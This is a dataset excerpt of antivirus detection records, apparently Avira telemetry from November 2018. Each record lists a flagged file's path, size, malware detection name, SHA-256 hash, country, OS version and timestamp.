  Row(detection=Row(filename='avscan-20181102-053943-ab75ab6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053943-AB75AB6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055645-0caad53c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055645-0CAAD53C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060203-ca0aa988', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060203-CA0AA988', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054541-80ecf676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054541-80ECF676', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052317-6024e847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052317-6024E847', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060024-8f2d8f43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060024-8F2D8F43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060031-935ab8fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060031-935AB8FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8df9e227', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8DF9E227', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052936-41ad1dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052936-41AD1DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052740-fc7266de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052740-FC7266DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054037-cbdc7045', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054037-CBDC7045', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050459-d19ef4f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050459-D19EF4F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053025-5ecdcd23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053025-5ECDCD23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055548-eabd1977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055548-EABD1977', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051121-b5614453', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051121-B5614453', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061550-b7209847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061550-B7209847', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050624-043446dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050624-043446DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052231-44936cae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052231-44936CAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\78F947BA30F53EA42351886328646CE887FC2BC67957B384BD07E6939C9D281B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='78f947ba30f53ea42351886328646ce887fc2bc67957b384bd07e6939c9d281b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054809-d94b5e43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054809-D94B5E43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\79B60C546B57A845A45B41B1C5F6AF57933439927E1DCF49660B5237F9B18697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055524-dc848061', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055524-DC848061', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050546-ed7c7b37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050546-ED7C7B37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062218-9ed05a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062218-9ED05A2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053731-5cacc3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053731-5CACC3FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062103-71eea0e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062103-71EEA0E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060501-34555559', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060501-34555559', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:54:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053308-c0049fff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053308-C0049FFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061514-a1c667d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061514-A1C667D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053726-5a0e7433', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053726-5A0E7433', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055425-b958cd59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055425-B958CD59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054433-58c31701', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054433-58C31701', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051157-ca5e67f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051157-CA5E67F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053707-4ea5386a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053707-4EA5386A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053328-cc4fb9a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053328-CC4FB9A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054808-d88300de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054808-D88300DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:40:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gf.2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF INDONESIA\\LAP.BULANAN\\GF.2014\\GF.2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154629-619fca63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154629-619FCA63', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210737-298f2cd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210737-298F2CD0', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155533-bd300caf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155533-BD300CAF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:52:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gupdate.exe', filepath='H:\\DATA LAMA\\korespondensi ( D )\\d3bdbc504b5f33660aae92eb\\update\\gupdate.exe', filesize=716000, name='TR/Patched.Gen.#M300.#R3211'), hash='268ef5effb367847c104236af136319bc3bd7b35312acf198aace4a15d0a8798', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\Ground.exe', parentsize=534016, timestamp='2018-11-01T23:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154753-6fb24198', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154753-6FB24198', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T15:18:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205058-a331aae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b3db939\\AVSCAN-20181101-205023-9C532B0F\\AVSCAN-20181101-205058-A331AAE3', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='535d6a370c11ea8999e478968994022ae16c60fb69f0fa5e76b4a6a9403f1c8f', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gaji.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF INDONESIA\\GAJI\\GAJI.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sp.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF INDONESIA\\sp\\sp.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='300905.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PROGRM\\komp02\\300905\\300905.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:47Z'), dt=datetime.date(2018, 11, 1)),
